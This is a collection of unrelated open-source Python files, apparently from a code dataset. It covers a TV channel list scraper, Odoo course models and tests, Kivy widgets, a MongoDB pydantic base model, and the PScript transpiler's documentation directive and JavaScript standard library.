except:
logging.exception("Error with rtmidi")
sys.exit("Error, check log")
elif(config["audioService"]=="alsa"):
try:
midi_in = rtmidi.MidiIn()
execution(midi_in,"alsa",appConfig)
except:
logging.exception("Error with rtmidi")
sys.exit("Error, check log")
else:
print("Invalid audioService , check config.json")
sys.exit()
if __name__== "__main__":
main()
```
|
{
"source": "jesusvlc/TDTChannels",
"score": 3
}
|
#### File: TDTChannels/script/my_script.py
```python
import json
import requests
from ambit import Ambito
from channel import Channel
from country import Country
def substring(text, match):
return text.split(match)
def stringbetween(text, start, end):
text_from_start_to_all = substring(text, start)[1]
text_from_start_to_end = substring(text_from_start_to_all, end)[0]
return text_from_start_to_end
def get_channels_from_part(text):
line_where_first_channel_starts = 15
attributes_per_item = 6
channel_list = []
list_to_iterate = text.split("|")[line_where_first_channel_starts:]
while "\n" in list_to_iterate:
list_to_iterate.remove("\n")
while "\n\n" in list_to_iterate:
list_to_iterate.remove("\n\n")
for i in range(0, len(list_to_iterate), attributes_per_item):
item_name = list_to_iterate[i].strip()
item_options = list_to_iterate[i + 1].strip()
item_web = list_to_iterate[i + 2].strip()
if len(item_web) > 0 and item_web[0] != "-":
item_web = stringbetween(item_web, "(", ")")
if len(item_web) == 1:
item_web = ""
item_resolution = list_to_iterate[i + 3].strip()
if len(item_resolution) == 1:
item_resolution = ""
item_logo = list_to_iterate[i + 4].strip()
if len(item_logo) > 0 and item_logo[0] != "-":
item_logo = stringbetween(item_logo, "(", ")")
if len(item_logo) == 1:
item_logo = ""
item_epg = list_to_iterate[i + 5].strip()
if len(item_epg) == 1:
item_epg = ""
item_options = item_options.split(" - ")
channel = Channel(item_name, item_web, item_resolution, item_logo, item_epg)
if len(item_options) > 0 and item_options[0] != "-":
for option in item_options:
format = (option[1:5]).replace("]", "")
url = stringbetween(option, "(", ")")
channel.add_option(format, url)
channel_list.append(channel)
return channel_list
page = requests.get('https://raw.githubusercontent.com/LaQuay/TDTChannels/master/README.md',
headers={'Cache-Control': 'no-cache'})
content = str(page.text)
spain = Country("Spain")
canales_nacionales = stringbetween(content, "### Nacionales", "### Informativos")
spain.add_ambit(Ambito("Generalistas", get_channels_from_part(canales_nacionales)))
canales_informativos = stringbetween(content, "### Informativos", "### Deportivos")
spain.add_ambit(Ambito("Informativos", get_channels_from_part(canales_informativos)))
canales_deportivos = stringbetween(content, "### Deportivos", "### Infantiles")
spain.add_ambit(Ambito("Deportivos", get_channels_from_part(canales_deportivos)))
canales_infantiles = stringbetween(content, "### Infantiles", "### Musicales")
spain.add_ambit(Ambito("Infantiles", get_channels_from_part(canales_infantiles)))
canales_musicales = stringbetween(content, "### Musicales", "### Autonómicos")
spain.add_ambit(Ambito("Musicales", get_channels_from_part(canales_musicales)))
canales_autonomicos_andalucia = stringbetween(content, "#### Andalucía", "#### Aragón")
spain.add_ambit(Ambito("Andalucía", get_channels_from_part(canales_autonomicos_andalucia)))
canales_autonomicos_aragon = stringbetween(content, "#### Aragón", "#### Asturias")
spain.add_ambit(Ambito("Aragón", get_channels_from_part(canales_autonomicos_aragon)))
canales_autonomicos_asturias = stringbetween(content, "#### Asturias", "#### Canarias")
spain.add_ambit(Ambito("Asturias", get_channels_from_part(canales_autonomicos_asturias)))
canales_autonomicos_canarias = stringbetween(content, "#### Canarias", "#### Cantabria")
spain.add_ambit(Ambito("Canarias", get_channels_from_part(canales_autonomicos_canarias)))
canales_autonomicos_cantabria = stringbetween(content, "#### Cantabria", "#### Castilla la Mancha")
spain.add_ambit(Ambito("Cantabria", get_channels_from_part(canales_autonomicos_cantabria)))
canales_autonomicos_castilla_mancha = stringbetween(content, "#### Castilla la Mancha", "#### Castilla y León")
spain.add_ambit(Ambito("Castilla la Mancha", get_channels_from_part(canales_autonomicos_castilla_mancha)))
canales_autonomicos_castilla_leon = stringbetween(content, "#### Castilla y León", "#### Catalunya")
spain.add_ambit(Ambito("Castilla y León", get_channels_from_part(canales_autonomicos_castilla_leon)))
canales_autonomicos_catalunya = stringbetween(content, "#### Catalunya", "#### Ceuta")
spain.add_ambit(Ambito("Catalunya", get_channels_from_part(canales_autonomicos_catalunya)))
canales_autonomicos_ceuta = stringbetween(content, "#### Ceuta", "#### Extremadura")
spain.add_ambit(Ambito("Ceuta", get_channels_from_part(canales_autonomicos_ceuta)))
canales_autonomicos_extremadura = stringbetween(content, "#### Extremadura", "#### Galicia")
spain.add_ambit(Ambito("Extremadura", get_channels_from_part(canales_autonomicos_extremadura)))
canales_autonomicos_galicia = stringbetween(content, "#### Galicia", "#### Islas Baleares")
spain.add_ambit(Ambito("Galicia", get_channels_from_part(canales_autonomicos_galicia)))
canales_autonomicos_islas_baleares = stringbetween(content, "### Islas Baleares", "#### Madrid")
spain.add_ambit(Ambito("Islas Baleares", get_channels_from_part(canales_autonomicos_islas_baleares)))
canales_autonomicos_madrid = stringbetween(content, "#### Madrid", "#### Melilla")
spain.add_ambit(Ambito("Madrid", get_channels_from_part(canales_autonomicos_madrid)))
canales_autonomicos_melilla = stringbetween(content, "#### Melilla", "#### Murcia")
spain.add_ambit(Ambito("Melilla", get_channels_from_part(canales_autonomicos_melilla)))
canales_autonomicos_murcia = stringbetween(content, "#### Murcia", "#### Navarra")
spain.add_ambit(Ambito("Murcia", get_channels_from_part(canales_autonomicos_murcia)))
canales_autonomicos_navarra = stringbetween(content, "#### Navarra", "#### Pais Vasco")
spain.add_ambit(Ambito("Navarra", get_channels_from_part(canales_autonomicos_navarra)))
canales_autonomicos_pais_vasco = stringbetween(content, "#### Pais Vasco", "#### La Rioja")
spain.add_ambit(Ambito("Pais Vasco", get_channels_from_part(canales_autonomicos_pais_vasco)))
canales_autonomicos_la_rioja = stringbetween(content, "#### La Rioja", "#### Valencia")
spain.add_ambit(Ambito("La Rioja", get_channels_from_part(canales_autonomicos_la_rioja)))
canales_autonomicos_valencia = stringbetween(content, "#### Valencia", "## Internacionales")
spain.add_ambit(Ambito("Valencia", get_channels_from_part(canales_autonomicos_valencia)))
# Save data to JSON file
json_file = open('./public/output/channels.json', "w+")
# TODO Anadir copyright
json_file.write(json.dumps(spain.to_json()))
json_file.close()
# Save data to M3U8 file
text_file = open('./public/output/channels.m3u8', "w+")
text_file.write("#EXTM3U" + "\n")
text_file.write("# @LaQuay https://github.com/LaQuay/TDTChannels" + "\n")
text_file.write(spain.to_m3u8())
text_file.close()
print("JSON + M3U8 Updated")
```
|
{
"source": "JesusZapata/academy",
"score": 2
}
|
#### File: academy/models/models.py
```python
from odoo import models, fields, api
class Teachers(models.Model):
_name = 'academy.teachers'
name = fields.Char()
biography = fields.Html()
course_ids = fields.One2many('product.template', 'teacher_id', string="Courses")
class Courses(models.Model):
_inherit = 'product.template'
name = fields.Char()
teacher_id = fields.Many2one('academy.teachers', string="Teacher")
# class academy(models.Model):
# _name = 'academy.academy'
# name = fields.Char()
# value = fields.Integer()
# value2 = fields.Float(compute="_value_pc", store=True)
# description = fields.Text()
#
# @api.depends('value')
# def _value_pc(self):
# self.value2 = float(self.value) / 100
```
|
{
"source": "JesusZapata/openacademy",
"score": 3
}
|
#### File: openacademy/tests/test_global_openacademy_course.py
```python
from psycopg2 import IntegrityError
from openerp.tests.common import TransactionCase
from openerp.tools import mute_logger
class GlobalOpenAcademyCourse(TransactionCase):
"""
Test Model Course
"""
def setUp(self):
super(GlobalOpenAcademyCourse, self).setUp()
self.course = self.env['openacademy.course']
def create_course(self, course_name, course_description,
course_responsible_id):
course_id = self.course.create({
'name': course_name,
'description': course_description,
'responsible_id': course_responsible_id,
})
return course_id
@mute_logger('openerp.sql_db')
def test_10_same_name_description(self):
"""
Test constraints name_description_check
"""
with self.assertRaisesRegexp(
IntegrityError,
'new row for relation "openacademy_course" violates'
' check constraint "openacademy_course_name_description_check"'
):
self.create_course('test', 'test', None)
@mute_logger('openerp.sql_db')
def test_20_two_courses_same_name(self):
"""
Test constraints name_unique
"""
self.create_course('test1', 'test_description', None)
with self.assertRaisesRegexp(
IntegrityError,
'duplicate key value violates unique'
' constraint "openacademy_course_name_unique"'
):
self.create_course('test1', 'test_description', None)
def test_15_duplicate_course(self):
"""
Test copy method
"""
course = self.env.ref('openacademy.course0')
course.copy()
```
|
{
"source": "JesusZerpa/kivy-recyclescrollview",
"score": 3
}
|
#### File: JesusZerpa/kivy-recyclescrollview/recyclescrollview.py
```python
from kivy.factory import Factory
from kivy.properties import *
from kivy.uix.floatlayout import FloatLayout
from kivy.uix.boxlayout import BoxLayout
class RecycleScrollView(Factory.ScrollView):
viewclass=StringProperty("")
data=ListProperty([])
#box
orientation= 'vertical'
default_height= 1000
cursor=0
max_items=10
widget_height=None
def __init__(self,*args,**kwargs):
super(RecycleScrollView,self).__init__(*args,**kwargs)
self.do_scroll_y=True
self.box=BoxLayout(orientation="vertical",size_hint_y= None,height=self.default_height)
self.add_widget(self.box)
def on_parent(self,instance,value):
pass
def on_size(self,instance,value):
height=0
for elem in self.children[0].children:
height+=elem.height
self.children[0].height=height
def on_scroll_move(self,instance):
if self.widget_height:
dx=self.box.height-(self.scroll_y*self.box.height)
if dx>0:
item_passed=dx/self.widget_height
self.cursor=int(item_passed)
self.update()
return super().on_scroll_move(instance)
def on_scroll_stop(self,instance):
if self.widget_height:
dx=self.box.height-(self.scroll_y*self.box.height)
if dx>0:
item_passed=dx/self.widget_height
self.cursor=int(item_passed)
self.update()
return super().on_scroll_stop(instance)
def update(self):
self.clear_widgets()
widget=getattr(Factory,self.viewclass)
_widget=widget()
self.box=FloatLayout(size_hint_y= None,height=self.default_height)
super(RecycleScrollView,self).add_widget(self.box)
self.box.top=self.top
for k,item in enumerate(self.data[self.cursor:self.cursor+self.max_items]):
widget=getattr(Factory,self.viewclass)
_widget=widget()
_widget.size_hint_y=None
self.box.add_widget(_widget)
_widget.pos=(_widget.pos[0],(_widget.height*len(self.data))-(_widget.height*(self.cursor+k+1)))
for elem in item:
setattr(_widget,elem,item[elem])
self.box.height=self.widget_height*len(self.data)
def on_classview(self,instance,value):
instance.classview=value
def on_data(self,instance,value):
#button
#size_hint: (1, None)
#height: 200
self.data=value
for k,item in enumerate(self.data[self.cursor:self.cursor+self.max_items]):
widget=getattr(Factory,self.viewclass)
_widget=widget()
_widget.size_hint_y=None
for elem in item:
setattr(_widget,elem,item[elem])
if self.widget_height==None:
self.widget_height=_widget.height
self.box.add_widget(_widget)
```
|
{
"source": "JesusZerpa/kivy-web-syntax-sublime-text",
"score": 2
}
|
#### File: kivy-web-syntax-sublime-text/preview/kv.preview.py
```python
import os
import sys
try:
import kivy
except ImportError as e:
sys.exit(1)
from kivy.app import App
from kivy.clock import Clock
from kivy.core.window import Window
from kivy.lang import Builder
from kivy.properties import ObjectProperty
from kivy.uix.boxlayout import BoxLayout
Window.size = (800, 600)
class InterfaceManager(BoxLayout):
pass
class PreviewApp(App):
stats = ObjectProperty(None)
def __init__(self, filename):
super(PreviewApp, self).__init__()
self.filename = filename
self.root = InterfaceManager()
Clock.schedule_interval(self.update_ui, .5)
def on_stats(self, instance, value):
self.root.clear_widgets()
self.root.add_widget(Builder.load_file(self.filename))
def update_ui(self, dt):
self.stats = os.stat(self.filename)
def build(self):
pass
if __name__ == '__main__':
from importlib import import_module
sys.path.append(sys.argv[2])
file_path = os.path.dirname(os.path.realpath(sys.argv[1]))
sys.path.append(os.getcwd())
sys.path.append(file_path)
if os.path.isfile(os.path.join(sys.argv[2], 'main.py')) or \
os.path.isfile(os.path.join(os.getcwd(), 'main.py')):
import_module('main')
app = PreviewApp(sys.argv[1])
app.run()
```
|
{
"source": "JesusZerpa/Mongomantic",
"score": 3
}
|
#### File: mongomantic/core/mongo_model.py
```python
from typing import Any, Dict, Optional, Type
from abc import ABC
from datetime import datetime
from bson import ObjectId
from bson.objectid import InvalidId
from pydantic import BaseConfig, BaseModel
class OID:
@classmethod
def __get_validators__(cls):
yield cls.validate
@classmethod
def validate(cls, v):
try:
return ObjectId(str(v))
except InvalidId:
raise ValueError("Invalid object ID")
class MongoDBModel(BaseModel, ABC):
id: Optional[OID]
class Config(BaseConfig):
allow_population_by_field_name = True
json_encoders = {
datetime: lambda dt: dt.isoformat(),
ObjectId: str,
}
@classmethod
def from_mongo(cls, data: Dict[str, Any]) -> Optional[Type["MongoDBModel"]]:
"""Constructs a pydantic object from mongodb compatible dictionary"""
if not data:
return None
id = data.pop("_id", None) # Convert _id into id
return cls(**dict(data, id=id))
def to_mongo(self, **kwargs):
"""Maps a pydantic model to a mongodb compatible dictionary"""
exclude_unset = kwargs.pop(
"exclude_unset",
False, # Set as false so that default values are also stored
)
by_alias = kwargs.pop(
"by_alias", True
) # whether field aliases should be used as keys in the returned dictionary
# Converting the model to a dictionnary
parsed = self.dict(by_alias=by_alias, exclude_unset=exclude_unset, **kwargs)
# Mongo uses `_id` as default key.
# if "_id" not in parsed and "id" in parsed:
# parsed["_id"] = parsed.pop("id")
if "id" in parsed:
parsed.pop("id")
return parsed
def dict(self, **kwargs):
"""Override self.dict to hide some fields that are used as metadata"""
hidden_fields = {"_collection"}
kwargs.setdefault("exclude", hidden_fields)
return super().dict(**kwargs)
```
|
{
"source": "JesusZerpa/pscript",
"score": 3
}
|
#### File: docs/scripts/pscriptexample.py
```python
import os
import hashlib
from pygments import highlight
from pygments.lexers import get_lexer_by_name
from pygments.formatters import HtmlFormatter
from docutils.parsers.rst import Directive
from docutils import nodes
from pscript import py2js
pythonLexer, javaScriptLexer = get_lexer_by_name('py'), get_lexer_by_name('js')
htmlFormatter = HtmlFormatter()
#
# THIS_DIR = os.path.abspath(os.path.dirname(__file__))
# HTML_DIR = os.path.abspath(os.path.join(THIS_DIR, '..', '_build', 'html'))
#
# if not os.path.isdir(HTML_DIR + '/ui'):
# os.mkdir(HTML_DIR + '/ui')
#
# if not os.path.isdir(HTML_DIR + '/ui/examples'):
# os.mkdir(HTML_DIR + '/ui/examples')
def my_highlight(code):
return highlight(code, PythonLexer(), HtmlFormatter())
class pscript_example(nodes.raw): pass
def visit_pscript_example_html(self, node):
# Fix for rtd
if not hasattr(node, 'code'):
return
# Get code
code = node.code.strip() + '\n'
# Split in parts (blocks between two newlines)
lines = [line.rstrip() for line in code.splitlines()]
code = '\n'.join(lines)
parts = code.split('\n\n')
td_style1 = "style='vertical-align:top; min-width:300px;'"
td_style2 = "style='vertical-align:top;'"
pre_style = "style='margin:2px; padding: 2px; border:0px;'"
#self.body.append("<style> div.hiddenjs {height: 1.2em; width: 2em; overflow:hidden; font-size: small;} div.hiddenjs:hover {height: initial; width: initial;} div.hiddenjs:hover > .ph {display:none;} </style>\n")
self.body.append("<style> div.hiddenjs {overflow:hidden; font-size: small; min-width:200px; min-height:30px;} div.hiddenjs > .js {display:none} div.hiddenjs:hover > .js {display:block} div.hiddenjs:hover > .ph {display:none;} </style>\n")
self.body.append("<table>")
#self.body.append("<tr><td style='text-align:right;'> <i>PScript</i> </td><td> <i>JS</i> </td></tr>")
for py in parts:
if py.strip().startswith('##'):
lines = [line.lstrip(' \n#\t') for line in py.splitlines()]
lines[0] = '<b>%s</b><br />' % lines[0]
text = ''.join(lines)
self.body.append('<tr><td %s>%s</td><td %s></td></tr>' %
(td_style, text, td_style))
continue
js = py2js(py)
py_html = highlight(py, pythonLexer, htmlFormatter)
js_html = highlight(js, javaScriptLexer, htmlFormatter)
py_html = py_html.replace("<pre>", '<pre %s>' % pre_style)
js_html = js_html.replace("<pre>", '<pre %s>' % pre_style)
js_html = "<div class='hiddenjs'><div class='ph'>JS</div> <div class='js'>%s</div> </div>" % js_html
#self.body.append("%s <div class='hiddenjs'><a> </a> %s</div>" % (py_html, js_html))
self.body.append("<tr><td %s>%s</td><td %s>%s</td></tr>" %
(td_style1, py_html, td_style2, js_html))
self.body.append("</table>")
def depart_pscript_example_html(self, node):
pass
class PscriptExampleDirective(Directive):
has_content = True
def run(self):
# Get code and extact height
code = '\n'.join(self.content)
try:
height = int(self.content[0])
except Exception:
height = 300
else:
code = code.split('\n', 1)[1].strip()
# iframe
table = pscript_example('')
table.code = code
return[table]
def setup(Sphynx):
#Sphynx.add_javascript('js-image-slider.js')
#Sphynx.add_stylesheet('js-image-slider.css')
Sphynx.add_node(pscript_example, html=(visit_pscript_example_html, depart_pscript_example_html))
Sphynx.add_directive('pscript_example', PscriptExampleDirective)
```
#### File: pscript/pscript/stdlib.py
```python
import re
# Functions not covered by this lib:
# isinstance, issubclass, print, len, max, min, callable, chr, ord
FUNCTIONS = {}
METHODS = {}
FUNCTION_PREFIX = '_pyfunc_'
METHOD_PREFIX = '_pymeth_'
def get_std_info(code):
""" Given the JS code for a std function or method, determine the
number of arguments, function_deps and method_deps.
"""
_, _, nargs = code.splitlines()[0].partition('nargs:')
nargs = [int(i.strip()) for i in nargs.strip().replace(',', ' ').split(' ') if i]
# Collect dependencies on other funcs/methods
sep = FUNCTION_PREFIX
function_deps = [part.split('(')[0].strip() for part in code.split(sep)[1:]]
sep = METHOD_PREFIX
method_deps = [part.split('.')[0].strip() for part in code.split(sep)[1:]]
# Reduce and sort
function_deps = sorted(set(function_deps))
method_deps = sorted(set(method_deps))
# Filter
function_deps = [dep for dep in function_deps if dep not in method_deps]
function_deps = set([dep for dep in function_deps if dep in FUNCTIONS])
method_deps = set([dep for dep in method_deps if dep in METHODS])
# Recurse
for dep in list(function_deps):
_update_deps(FUNCTIONS[dep], function_deps, method_deps)
for dep in list(method_deps):
_update_deps(METHODS[dep], function_deps, method_deps)
return nargs, sorted(function_deps), sorted(method_deps)
def _update_deps(code, function_deps, method_deps):
""" Given the code of a dependency, recursively resolve additional dependencies.
"""
# Collect deps
sep = FUNCTION_PREFIX
new_function_deps = [part.split('(')[0].strip() for part in code.split(sep)[1:]]
sep = METHOD_PREFIX
new_method_deps = [part.split('.')[0].strip() for part in code.split(sep)[1:]]
# Update
new_function_deps = set(new_function_deps).difference(function_deps)
new_method_deps = set(new_method_deps).difference(method_deps)
function_deps.update(new_function_deps)
method_deps.update(new_method_deps)
# Recurse
for dep in new_function_deps:
_update_deps(FUNCTIONS[dep], function_deps, method_deps)
for dep in new_method_deps:
_update_deps(METHODS[dep], function_deps, method_deps)
return function_deps, method_deps
def get_partial_std_lib(func_names, method_names, indent=0,
func_prefix=None, method_prefix=None):
""" Get the code for the PScript standard library consisting of
the given function and method names. The given indent specifies how
many sets of 4 spaces to prepend.
"""
func_prefix = 'var ' + FUNCTION_PREFIX if (func_prefix is None) else func_prefix
method_prefix = 'var ' + METHOD_PREFIX if (method_prefix is None) else method_prefix
lines = []
for name in sorted(func_names):
code = FUNCTIONS[name].strip()
if '\n' not in code:
code = code.rsplit('//', 1)[0].rstrip() # strip comment from one-liners
lines.append('%s%s = %s;' % (func_prefix, name, code))
for name in sorted(method_names):
code = METHODS[name].strip()
# lines.append('Object.prototype.%s%s = %s;' % (METHOD_PREFIX, name, code))
lines.append('%s%s = %s;' % (method_prefix, name, code))
code = '\n'.join(lines)
if indent:
lines = [' '*indent + line for line in code.splitlines()]
code = '\n'.join(lines)
return code
def get_full_std_lib(indent=0):
""" Get the code for the full PScript standard library.
The given indent specifies how many sets of 4 spaces to prepend.
If the full stdlib is made available in JavaScript, multiple
snippets of code can be transpiled without inlined stdlib parts by
using ``py2js(..., inline_stdlib=False)``.
"""
return get_partial_std_lib(FUNCTIONS.keys(), METHODS.keys(), indent)
# todo: now that we have modules, we can have shorter/no prefixes, right?
# -> though maybe we use them for string replacement somewhere?
def get_all_std_names():
""" Get list if function names and methods names in std lib.
"""
return ([FUNCTION_PREFIX + f for f in FUNCTIONS],
[METHOD_PREFIX + f for f in METHODS])
## ----- Functions
## Special functions: not really in builtins, but important enough to support
FUNCTIONS['perf_counter'] = """function() { // nargs: 0
if (typeof(process) === "undefined"){return performance.now()*1e-3;}
else {var t = process.hrtime(); return t[0] + t[1]*1e-9;}
}""" # Work in nodejs and browser
FUNCTIONS['time'] = """function () {return Date.now() / 1000;} // nargs: 0"""
## Hardcore functions
FUNCTIONS['op_instantiate'] = """function (ob, args) { // nargs: 2
if ((typeof ob === "undefined") ||
(typeof window !== "undefined" && window === ob) ||
(typeof global !== "undefined" && global === ob))
{throw "Class constructor is called as a function.";}
for (var name in ob) {
if (Object[name] === undefined &&
typeof ob[name] === 'function' && !ob[name].nobind) {
ob[name] = ob[name].bind(ob);
ob[name].__name__ = name;
}
}
if (ob.__init__) {
ob.__init__.apply(ob, args);
}
}"""
FUNCTIONS['create_dict'] = """function () {
var d = {};
for (var i=0; i<arguments.length; i+=2) { d[arguments[i]] = arguments[i+1]; }
return d;
}"""
FUNCTIONS['merge_dicts'] = """function () {
var res = {};
for (var i=0; i<arguments.length; i++) {
var d = arguments[i];
var key, keys = Object.keys(d);
for (var j=0; j<keys.length; j++) { key = keys[j]; res[key] = d[key]; }
}
return res;
}"""
# args is a list of (name, default) tuples, and is overwritten with names from kwargs
FUNCTIONS['op_parse_kwargs'] = """
function (arg_names, arg_values, kwargs, strict) { // nargs: 3
for (var i=0; i<arg_values.length; i++) {
var name = arg_names[i];
if (kwargs[name] !== undefined) {
arg_values[i] = kwargs[name];
delete kwargs[name];
}
}
if (strict && Object.keys(kwargs).length > 0) {
throw FUNCTION_PREFIXop_error('TypeError',
'Function ' + strict + ' does not accept **kwargs.');
}
return kwargs;
}""".lstrip()
FUNCTIONS['op_error'] = """function (etype, msg) { // nargs: 2
var e = new Error(etype + ': ' + msg);
e.name = etype
return e;
}"""
FUNCTIONS['hasattr'] = """function (ob, name) { // nargs: 2
return (ob !== undefined) && (ob !== null) && (ob[name] !== undefined);
}"""
FUNCTIONS['getattr'] = """function (ob, name, deflt) { // nargs: 2 3
var has_attr = ob !== undefined && ob !== null && ob[name] !== undefined;
if (has_attr) {return ob[name];}
else if (arguments.length == 3) {return deflt;}
else {var e = Error(name); e.name='AttributeError'; throw e;}
}"""
FUNCTIONS['setattr'] = """function (ob, name, value) { // nargs: 3
ob[name] = value;
}"""
FUNCTIONS['delattr'] = """function (ob, name) { // nargs: 2
delete ob[name];
}"""
FUNCTIONS['dict'] = """function (x) {
var t, i, keys, r={};
if (Array.isArray(x)) {
for (i=0; i<x.length; i++) {
t=x[i]; r[t[0]] = t[1];
}
} else {
keys = Object.keys(x);
for (i=0; i<keys.length; i++) {
t=keys[i]; r[t] = x[t];
}
}
return r;
}"""
FUNCTIONS['list'] = """function (x) {
var r=[];
if (typeof x==="object" && !Array.isArray(x)) {x = Object.keys(x)}
for (var i=0; i<x.length; i++) {
r.push(x[i]);
}
return r;
}"""
FUNCTIONS['range'] = """function (start, end, step) {
var i, res = [];
var val = start;
var n = (end - start) / step;
for (i=0; i<n; i++) {
res.push(val);
val += step;
}
return res;
}"""
FUNCTIONS['format'] = """function (v, fmt) { // nargs: 2
fmt = fmt.toLowerCase();
var s = String(v);
if (fmt.indexOf('!r') >= 0) {
try { s = JSON.stringify(v); } catch (e) { s = undefined; }
if (typeof s === 'undefined') { s = v._IS_COMPONENT ? v.id : String(v); }
}
var fmt_type = '';
if (fmt.slice(-1) == 'i' || fmt.slice(-1) == 'f' ||
fmt.slice(-1) == 'e' || fmt.slice(-1) == 'g') {
fmt_type = fmt[fmt.length-1]; fmt = fmt.slice(0, fmt.length-1);
}
var i0 = fmt.indexOf(':');
var i1 = fmt.indexOf('.');
var spec1 = '', spec2 = ''; // before and after dot
if (i0 >= 0) {
if (i1 > i0) { spec1 = fmt.slice(i0+1, i1); spec2 = fmt.slice(i1+1); }
else { spec1 = fmt.slice(i0+1); }
}
// Format numbers
if (fmt_type == '') {
} else if (fmt_type == 'i') { // integer formatting, for %i
s = parseInt(v).toFixed(0);
} else if (fmt_type == 'f') { // float formatting
v = parseFloat(v);
var decimals = spec2 ? Number(spec2) : 6;
s = v.toFixed(decimals);
} else if (fmt_type == 'e') { // exp formatting
v = parseFloat(v);
var precision = (spec2 ? Number(spec2) : 6) || 1;
s = v.toExponential(precision);
} else if (fmt_type == 'g') { // "general" formatting
v = parseFloat(v);
var precision = (spec2 ? Number(spec2) : 6) || 1;
// Exp or decimal?
s = v.toExponential(precision-1);
var s1 = s.slice(0, s.indexOf('e')), s2 = s.slice(s.indexOf('e'));
if (s2.length == 3) { s2 = 'e' + s2[1] + '0' + s2[2]; }
var exp = Number(s2.slice(1));
if (exp >= -4 && exp < precision) { s1=v.toPrecision(precision); s2=''; }
// Skip trailing zeros and dot
var j = s1.length-1;
while (j>0 && s1[j] == '0') { j-=1; }
s1 = s1.slice(0, j+1);
if (s1.slice(-1) == '.') { s1 = s1.slice(0, s1.length-1); }
s = s1 + s2;
}
// prefix/padding
var prefix = '';
if (spec1) {
if (spec1[0] == '+' && v > 0) { prefix = '+'; spec1 = spec1.slice(1); }
else if (spec1[0] == ' ' && v > 0) { prefix = ' '; spec1 = spec1.slice(1); }
}
if (spec1 && spec1[0] == '0') {
var padding = Number(spec1.slice(1)) - (s.length + prefix.length);
s = '0'.repeat(Math.max(0, padding)) + s;
}
return prefix + s;
}"""
## Normal functions
FUNCTIONS['pow'] = 'Math.pow // nargs: 2'
FUNCTIONS['sum'] = """function (x) { // nargs: 1
return x.reduce(function(a, b) {return a + b;});
}"""
FUNCTIONS['round'] = 'Math.round // nargs: 1'
FUNCTIONS['int'] = """function (x, base) { // nargs: 1 2
if(base !== undefined) return parseInt(x, base);
return x<0 ? Math.ceil(x): Math.floor(x);
}"""
FUNCTIONS['float'] = 'Number // nargs: 1'
FUNCTIONS['str'] = 'String // nargs: 0 1'
# Note use of "_IS_COMPONENT" to check for flexx.app component classes.
FUNCTIONS['repr'] = """function (x) { // nargs: 1
var res; try { res = JSON.stringify(x); } catch (e) { res = undefined; }
if (typeof res === 'undefined') { res = x._IS_COMPONENT ? x.id : String(x); }
return res;
}"""
FUNCTIONS['bool'] = """function (x) { // nargs: 1
return Boolean(FUNCTION_PREFIXtruthy(x));
}"""
FUNCTIONS['abs'] = 'Math.abs // nargs: 1'
FUNCTIONS['divmod'] = """function (x, y) { // nargs: 2
var m = x % y; return [(x-m)/y, m];
}"""
FUNCTIONS['all'] = """function (x) { // nargs: 1
for (var i=0; i<x.length; i++) {
if (!FUNCTION_PREFIXtruthy(x[i])){return false;}
} return true;
}"""
FUNCTIONS['any'] = """function (x) { // nargs: 1
for (var i=0; i<x.length; i++) {
if (FUNCTION_PREFIXtruthy(x[i])){return true;}
} return false;
}"""
FUNCTIONS['enumerate'] = """function (iter) { // nargs: 1
var i, res=[];
if ((typeof iter==="object") && (!Array.isArray(iter))) {iter = Object.keys(iter);}
for (i=0; i<iter.length; i++) {res.push([i, iter[i]]);}
return res;
}"""
FUNCTIONS['zip'] = """function () { // nargs: 2 3 4 5 6 7 8 9
var i, j, tup, arg, args = [], res = [], len = 1e20;
for (i=0; i<arguments.length; i++) {
arg = arguments[i];
if ((typeof arg==="object") && (!Array.isArray(arg))) {arg = Object.keys(arg);}
args.push(arg);
len = Math.min(len, arg.length);
}
for (j=0; j<len; j++) {
tup = []
for (i=0; i<args.length; i++) {tup.push(args[i][j]);}
res.push(tup);
}
return res;
}"""
FUNCTIONS['reversed'] = """function (iter) { // nargs: 1
if ((typeof iter==="object") && (!Array.isArray(iter))) {iter = Object.keys(iter);}
return iter.slice().reverse();
}"""
FUNCTIONS['sorted'] = """function (iter, key, reverse) { // nargs: 1 2 3
if ((typeof iter==="object") && (!Array.isArray(iter))) {iter = Object.keys(iter);}
var comp = function (a, b) {a = key(a); b = key(b);
if (a<b) {return -1;} if (a>b) {return 1;} return 0;};
comp = Boolean(key) ? comp : undefined;
iter = iter.slice().sort(comp);
if (reverse) iter.reverse();
return iter;
}"""
FUNCTIONS['filter'] = """function (func, iter) { // nargs: 2
if (typeof func === "undefined" || func === null) {func = function(x) {return x;}}
if ((typeof iter==="object") && (!Array.isArray(iter))) {iter = Object.keys(iter);}
return iter.filter(func);
}"""
FUNCTIONS['map'] = """function (func, iter) { // nargs: 2
if (typeof func === "undefined" || func === null) {func = function(x) {return x;}}
if ((typeof iter==="object") && (!Array.isArray(iter))) {iter = Object.keys(iter);}
return iter.map(func);
}"""
## Other / Helper functions
FUNCTIONS['truthy'] = """function (v) {
if (v === null || typeof v !== "object") {return v;}
else if (v.length !== undefined) {return v.length ? v : false;}
else if (v.byteLength !== undefined) {return v.byteLength ? v : false;}
else if (v.constructor !== Object) {return true;}
else {return Object.getOwnPropertyNames(v).length ? v : false;}
}"""
FUNCTIONS['op_equals'] = """function op_equals (a, b) { // nargs: 2
var a_type = typeof a;
// If a (or b actually) is of type string, number or boolean, we don't need
// to do all the other type checking below.
if (a_type === "string" || a_type === "boolean" || a_type === "number") {
return a == b;
}
if (a == null || b == null) {
} else if (Array.isArray(a) && Array.isArray(b)) {
var i = 0, iseq = a.length == b.length;
while (iseq && i < a.length) {iseq = op_equals(a[i], b[i]); i+=1;}
return iseq;
} else if (a.constructor === Object && b.constructor === Object) {
var akeys = Object.keys(a), bkeys = Object.keys(b);
akeys.sort(); bkeys.sort();
var i=0, k, iseq = op_equals(akeys, bkeys);
while (iseq && i < akeys.length)
{k=akeys[i]; iseq = op_equals(a[k], b[k]); i+=1;}
return iseq;
} return a == b;
}"""
FUNCTIONS['op_contains'] = """function op_contains (a, b) { // nargs: 2
if (b == null) {
} else if (Array.isArray(b)) {
for (var i=0; i<b.length; i++) {if (FUNCTION_PREFIXop_equals(a, b[i]))
return true;}
return false;
} else if (b.constructor === Object) {
for (var k in b) {if (a == k) return true;}
return false;
} else if (b.constructor == String) {
return b.indexOf(a) >= 0;
} var e = Error('Not a container: ' + b); e.name='TypeError'; throw e;
}"""
FUNCTIONS['op_add'] = """function (a, b) { // nargs: 2
if (Array.isArray(a) && Array.isArray(b)) {
return a.concat(b);
} return a + b;
}"""
